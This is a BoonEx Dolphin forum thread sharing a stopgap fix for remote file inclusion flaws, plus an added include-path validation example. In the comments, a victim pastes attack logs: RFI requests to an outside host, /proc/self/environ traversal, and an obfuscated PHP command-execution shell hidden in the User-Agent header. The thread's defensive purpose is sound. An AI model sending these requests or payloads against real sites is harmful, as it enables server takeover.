sammie

Fix for dolphin exploit

add the following code to your ray/modules/global/inc/content.inc.php

add it at the top, above the first require_once statement

if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');

so it looks like this :

if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');

require_once($sIncPath . "xml.inc.php");
require_once($sIncPath . "constants.inc.php");
require_once($sIncPath . "apiFunctions.inc.php");

this stops any remote includes being used

next edit /plugins/safehtml/HTMLSax3.php and add this at the top, above the require_once

if (isset($_REQUEST['dir']))
die ('Hacking attempt');

so it looks like this:

if (isset($_REQUEST['dir']))
die ('Hacking attempt');

require_once( "{$dir['plugins']}safehtml/HTMLSax3/States.php" );
require_once( "{$dir['plugins']}safehtml/HTMLSax3/Decorators.php" );

this stops remote access to your directories
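
An alternative to matching on the parameter name, as an added example that is not part of the original post and not BoonEx code: validate the value of the include base itself, so a bad value is rejected whether it arrived by GET, POST, cookie or register_globals. The helper name resolve_include_base(), the temporary application root and the sample inputs are assumptions constructed for illustration.

```php
<?php
// Added example, not BoonEx code; resolve_include_base() is a hypothetical helper.

// Return the canonical directory for $candidate when it is an existing local
// directory inside $appRoot, or false for anything else.
function resolve_include_base($candidate, $appRoot)
{
    if (!is_string($candidate) || $candidate === '') {
        return false;                 // arrays and empty values
    }
    if (strpos($candidate, "\0") !== false) {
        return false;                 // null byte (%00) used to truncate the path
    }
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $candidate)) {
        return false;                 // http://, ftp://, php:// and similar wrappers
    }
    $real = realpath($candidate);     // resolves ../ and symlinks; false if missing
    $root = realpath($appRoot);
    if ($real === false || $root === false || !is_dir($real)) {
        return false;
    }
    $root = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    $real = rtrim($real, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $root, strlen($root)) === 0 ? $real : false;
}

// Constructed demo: a throwaway application root containing an inc/ directory.
$appRoot = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'demo_app_' . getmypid();
mkdir($appRoot . DIRECTORY_SEPARATOR . 'inc', 0700, true);

$candidates = array(                                  // constructed inputs
    $appRoot . '/inc/',                               // local directory under the root
    'http://example.invalid/x.txt?',                  // remote URL
    $appRoot . '/inc/../../../../proc/self/environ',  // traversal out of the root
    "../../proc/self/environ\0",                      // traversal plus null byte
    array('plugins' => 'http://example.invalid/'),    // array-shaped parameter
);
foreach ($candidates as $c) {
    $base  = resolve_include_base($c, $appRoot);
    $label = is_array($c) ? '(array)' : addcslashes($c, "\0");
    printf("%-6s %s\n", $base === false ? 'REJECT' : 'ACCEPT', $label);
}
rmdir($appRoot . DIRECTORY_SEPARATOR . 'inc');
rmdir($appRoot);

// In an include file the result replaces the raw variable, for example:
//   $base = resolve_include_base($sIncPath, $appRoot);
//   if ($base === false) die('Invalid include path');
//   require_once($base . 'xml.inc.php');
```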


Comments

paramike (positive), 126 days ago
 
Thank you so very much ...
 
sammie, 126 days ago
 
you are most welcome sweetie, hey it was only $30 so well worth it to make sure i don't get hacked too, but they looked over my server and told me it's secure and that fix will kill remote attack attempts on dolphin. as soon as i tested my site still works and can still upload and post on the forums, it's cool i posted it here.
 
clubk1d (positive), 126 days ago
 
thanks for sharing!!! :D
 
AndreyP, 126 days ago
 
Sammy, good :)
PS we are involved in making a fast-fix patch that closes all such security holes for old PHP versions, to prevent changing variables via GET params or when register globals is On.
Also we are closing other security holes (because this is not the only way to hack any site).
I spent several days and found many ways to hack any site. So register globals and all the fixes above are just the simplest and oldest way :)
 
DoLaugh, 126 days ago
 
Sammie, thanks, hopefully we can return the favor down the road!

DoLaugh
 
jerry79 (positive), 126 days ago
 
Thanks a lot Sammie! First I thought it's another "how to safe my site" post like the others. ;) But it contains new information on how to get rid of some hackers. Thanks for sharing! I'll update my files!

Greets,
Jerry
 
Stuart038 (positive), 126 days ago
 
Sammie, many thanks. Very generous!!

All the best.

Stuart
Ps. what was that about questionable code...?
 
clubk1d, 126 days ago
 
don't forget also to thank all folks out there who spend some time, just to keep your websites clean and clear from any bugs and intruders! :)
 
banbanbow (positive), 126 days ago
 
thanks, you're the best
 
gameutopia (positive), 125 days ago
 
Thanks for posting this. Even if it's not the official patch maybe it will help a few folks while we await the official word. Any time something like this is posted I'm certainly going to look into it and check it out. Thanks Again!!
 
sammie, 125 days ago
 
there is another exploit found that can affect sites with register globals off, i am hoping to have a patch for this tomorrow. boonex have been informed so hope they can include it in their patch, but it might delay their patch a little longer
 
pegasusteam (positive), 122 days ago
 
Thank you Sammie!
 
lrepton (positive), 116 days ago
 
Thanks for the tip
 
Synergy (positive), 83 days ago
 
Thanks Sammie!
 
Habitual, 83 days ago
 
Sammie:
thanks for the code mod snippets.
I work at hfw and am attempting to put this to use on one of the Dolphin installs that repeatedly gets suspended from RFI injections, etc...(seems like all I do is chase this exploit around.)

boonex says it's our register_globals=on on our VPSs.
We'd like to think it's the 777 perm'd directories
but I have seen RFIs even with it off.

Believe me, I want to see this activity solved once and for all.
I remain hopeful.

You mentioned "here is another exploit found" : can you elaborate, if not openly then some other way?
 
ken707, 57 days ago
 
My index.php was hacked.

Trying this mod now. My site has been hacked several times after the dolphin security fix. I have followed all security instructions and keep getting hacked through Boonex scripts.
 
ken707, 57 days ago
 
hack code used on my site,

//plugins/safehtml/safehtml.php?dir[plugins]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 617 "-" "<? $x0e=\"\\145x\\x65\\x63\"; $x0f=\"\\x66eo\\146\"; $x10=\"\\x66\\x72ea\\x64\"; $x11=\"\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\"; $x12=\"i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\"; $x13=\"\\152\\157\\x69\\156\"; $x14=\"o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\"; $x15=\"ob\\137\\x65\\156d\\137\\x63lea\\156\"; $x16=\"\\x6fb_st\\x61\\x72\\164\"; $x17=\"\\x70\\141\\163s\\164\\x68\\162\\165\"; $x18=\"\\x70\\143\\154ose\"; $x19=\"p\\157\\160e\\x6e\"; $x1a=\"\\163h\\145\\154l\\137\\x65\\170e\\143\"; $x1b=\"\\x73\\x79s\\x74e\\x6d\"; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\"\\n\",$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\"\\x72\"))){ $x0c = \"\"; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\"ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\");?>"
 
ken707, 57 days ago
 
more

83.64.48.195 - - [19/Sep/2008:20:38:46 -0400] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.vogelgesang-av.de/cache/DONTDELETEFAGOT/i??? HTTP/1.1" 200 638 "-" "http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]"
83.64.48.195 - - [19/Sep/2008:20:38:46 -0400] "GET /errors.php?error=http://www.vogelgesang-av.de/cache/DONTDELETEFAGOT/i??? HTTP/1.1" 404 1550 "-" "http://cr4nk.ws/ [de] (Windows 3.1; I) [crank]"
83.64.48.195 - - [19/Sep/2008:20:38:47 -0400] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 638 "-" "<? $x0e=\"\\145x\\x65\\x63\"; $x0f=\"\\x66eo\\146\"; $x10=\"\\x66\\x72ea\\x64\"; $x11=\"\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\"; $x12=\"i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\"; $x13=\"\\152\\157\\x69\\156\"; $x14=\"o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\"; $x15=\"ob\\137\\x65\\156d\\137\\x63lea\\156\"; $x16=\"\\x6fb_st\\x61\\x72\\164\"; $x17=\"\\x70\\141\\163s\\164\\x68\\162\\165\"; $x18=\"\\x70\\143\\154ose\"; $x19=\"p\\157\\160e\\x6e\"; $x1a=\"\\163h\\145\\154l\\137\\x65\\170e\\143\"; $x1b=\"\\x73\\x79s\\x74e\\x6d\"; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\"\\n\",$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\"\\x72\"))){ $x0c = \"\"; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\"ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\");?>"
83.64.48.195 - - [19/Sep/2008:20:38:48 -0400] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 638 "-" "<? $x0e=\"\\145x\\x65\\x63\"; $x0f=\"\\x66eo\\146\"; $x10=\"\\x66\\x72ea\\x64\"; $x11=\"\\146un\\x63\\164io\\x6e\\x5f\\x65x\\151s\\x74\\x73\"; $x12=\"i\\163\\x5f\\162\\x65s\\157ur\\x63\\x65\"; $x13=\"\\152\\157\\x69\\156\"; $x14=\"o\\142_g\\145t\\x5f\\x63o\\156\\164en\\x74\\x73\"; $x15=\"ob\\137\\x65\\156d\\137\\x63lea\\156\"; $x16=\"\\x6fb_st\\x61\\x72\\164\"; $x17=\"\\x70\\141\\163s\\164\\x68\\162\\165\"; $x18=\"\\x70\\143\\154ose\"; $x19=\"p\\157\\160e\\x6e\"; $x1a=\"\\163h\\145\\154l\\137\\x65\\170e\\143\"; $x1b=\"\\x73\\x79s\\x74e\\x6d\"; function x0b($x0b){ global $x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b,$x0c);$x0c = $x13(\"\\n\",$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b,\"\\x72\"))){ $x0c = \"\"; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d,1024); } @$x18($x0d);} } return $x0c;}echo x0b(\"ec\\150\\157\\x20c\\1624n\\153\\137\\x72oc\\153s\");?>"
 
ken707, 57 days ago
 
more

/ray/XML.php?action=getSettingValue&key=status&widget=youtube&file=main&_t=19
 
ken707, 57 days ago
 
more
POSSIBLE

/plugins/tiny_mce/tiny_mce_gzip.php?js=true&diskcache=true&core=true&suffix=&themes=simple%2Cadvanced&plugins=style%2Clayer%2Ctable%2Csave%2Cadvhr%2Cadvimage%2Cadvlink%2Cemotions%2Ciespell%2Cinsertdatetime%2Cpreview%2Cmedia%2Csearchreplace%2Cprint%2Ccontextmenu%2Cpaste%2Cdirectionality%2Cfullscreen%2Cnoneditable%2Cvisualchars%2Cnonbreaking%2Cxhtmlxtras&languages=en
 
kinder (positive), 34 days ago
 
thx sammie, no troubles yet, but hope to keep it this way. thx for sharing.
 
© 2008 BoonEx Ltd